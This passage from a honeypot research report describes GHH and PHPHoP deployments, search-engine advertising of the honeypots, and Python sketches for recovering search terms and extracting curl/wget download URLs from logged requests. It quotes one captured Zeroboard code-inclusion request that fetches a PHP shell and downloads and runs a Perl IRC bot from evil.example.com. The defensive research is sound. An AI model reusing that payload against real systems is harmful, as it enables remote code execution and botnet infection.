Current Research Methods

Two honeypot technologies are currently available for studying attacks against web applications: the "Google Hack" Honeypot (GHH) and PHPHoP (PHP Honeypot). For the study of web application attacks, these offer an advantage over traditional honeypots because their existence is advertised. Typically the honeypots can be found via specific searches in the Google or Yahoo search engines, which leads to a large number of sessions between potential attackers and the honeypots. Both are considered low-interaction honeypots in that they emulate web applications and/or their vulnerabilities.

We ran five GHH honeypots in one honeynet for about twelve months during 2005 and 2006. Some of these honeypots emulated a web application called PHPShell and others emulated the phpBB2 message board application. The PHPShell honeypots offered the appearance of access to the underlying operating system shell. All commands that the attacker executes are logged, together with details of the HTTP session in progress. If the attacker attempts to download any binaries, we obtain a copy of these as well. The phpBB2 honeypots emulated multiple remote code execution vulnerabilities, including the one exploited by the Santy worm as described above.

Our GHH honeypots were advertised using a technique we call "transparent linking". This involves placing hyperlinks pointing to our honeypots on other web pages so that the honeypots are indexed by search engines. The links are designed so that humans will not notice them, so the only visitors to a honeypot should be those who have specifically searched for it using a search engine. For example, we might insert a link displayed as just '.' into a web page which is already being indexed by a search engine. When the engine crawls the site again, it will follow the link and index the honeypot as well. By having the honeypot indexed in a search engine we increase the number of attacks that traverse our honeynet, rather than relying on attackers finding the honeypot by manual scanning. Usually, when a web browser visits the honeypot, the search criteria are revealed in the 'Referer' field of the HTTP request. All the traffic to the GHH honeypots was logged and inspected for malicious activity.
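As an illustration of how search criteria can be recovered from the Referer field, the following is a minimal sketch, not the GHH implementation. The function name search_terms and the table SEARCH_PARAMS are hypothetical, and the query parameter names ('q' for Google and MSN Search, 'p' for Yahoo) are assumptions about how those engines encode searches in their result URLs.

```python
from urllib.parse import urlsplit, parse_qs

# Assumed mapping from a host-name fragment to the query parameter
# that carries the search terms for that engine.
SEARCH_PARAMS = {"google.": "q", "yahoo.": "p", "msn.": "q"}


def search_terms(referer):
    """Return the search terms found in a Referer URL, or None."""
    if not referer:
        return None
    parts = urlsplit(referer)
    host = (parts.hostname or "").lower()
    for marker, param in SEARCH_PARAMS.items():
        if marker in host:
            # parse_qs decodes percent-escapes and '+' for us.
            values = parse_qs(parts.query).get(param)
            return values[0] if values else None
    # Not a recognised search engine.
    return None


if __name__ == "__main__":
    print(search_terms(
        "http://www.google.com/search?q=intitle%3Aphpshell+filetype%3Aphp"))
```

A visit with no Referer, or one arriving from an ordinary web page, yields None, so such visits can be logged separately from those that arrived through a search.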

The graph below shows the number of HTTP requests received by the Google Hack Honeypot honeynet during 2006. It includes requests from search engines indexing the pages on the honeypots, as well as malicious activity. There is a consistently high number of visits from search engines such as Yahoo, Google and MSN Search, and a fairly steady stream of other visitors trying to execute operating system commands on the honeypots.

[Figure: GHH activity, HTTP requests received by the GHH honeynet during 2006]

Another two PHPHoP honeypots have been running for about twelve months, emulating several vulnerable web applications including Advanced Web Statistics (awstats), the Mambo Content Management System and certain applications that use the PHPXMLRPC library. The emulations are relatively basic and would not convince a human attacker, but they do collect a variety of probes and automated exploit attempts, and they capture the files and payloads used in these attempts. For example, an attacker might send the honeypot a malicious request that attempts to exploit a remote code-inclusion problem in Zeroboard, a web bulletin board:

GET //bbs/skin/zero_vote/error.php?dir=http://evil.example.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http:/evil.example.com/w0w;perl%20w0w

The honeypot will parse the malicious request for commands such as 'curl' and 'wget', which are utilities for downloading data from the Internet. Any such commands found in the request will cause the data to be downloaded automatically by the honeypot and stored for later analysis. In this case, the file http://evil.example.com/cmd2.gif is a PHP helper script (similar to the c99 shell in Appendix B) which allows the execution of operating system commands. The command passed to it downloads and runs a Perl program called 'w0w' from the same server. Having obtained the file 'w0w', we ran it manually within a sandboxed environment and observed it join an IRC channel on a public IRC server.

Because these are low-interaction honeypots, there is no danger that an attacker can use them to damage other systems. All the incidents described are merely attempts to perform actions on these honeypots. For example, no phishing sites were actually available for the attackers to use. Similarly, all the uploaded binaries were manually analysed within sandboxes rather than by observing them running on the honeypots.
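The request parsing described above can be sketched roughly as follows. This is an illustrative example under stated assumptions, not PHPHoP's actual code: the name download_targets, the set DOWNLOADERS and the pattern URL_RE are hypothetical, and the sketch only extracts the URLs that a 'curl' or 'wget' command would fetch. It does not download anything.

```python
import re
from urllib.parse import unquote

# Download utilities to look for (taken from the text above).
DOWNLOADERS = {"curl", "wget"}

# Assumption: accept one or more slashes after the scheme, because the
# logged request above contains "http:/" with a single slash.
URL_RE = re.compile(r"https?:/+\S+")


def download_targets(request_target):
    """Return URLs that curl/wget commands in a request would fetch."""
    _path, _sep, query = request_target.partition("?")
    targets = []
    for pair in query.split("&"):
        _name, _eq, raw_value = pair.partition("=")
        value = unquote(raw_value)  # turns %20 back into spaces
        # Shell commands are chained with ';' or '|'.
        for command in re.split(r"[;|]+", value):
            words = command.split()
            if words and words[0] in DOWNLOADERS:
                targets.extend(w for w in words[1:] if URL_RE.fullmatch(w))
    return targets


if __name__ == "__main__":
    request = ("//bbs/skin/zero_vote/error.php"
               "?dir=http://evil.example.com/cmd2.gif?"
               "&cmd=cd%20/tmp;curl%20-O%20http:/evil.example.com/w0w;perl%20w0w")
    print(download_targets(request))
```

In a real deployment the returned URLs would be handed to a separate, isolated fetcher that stores the files for later analysis and never executes them, in keeping with the low-interaction design.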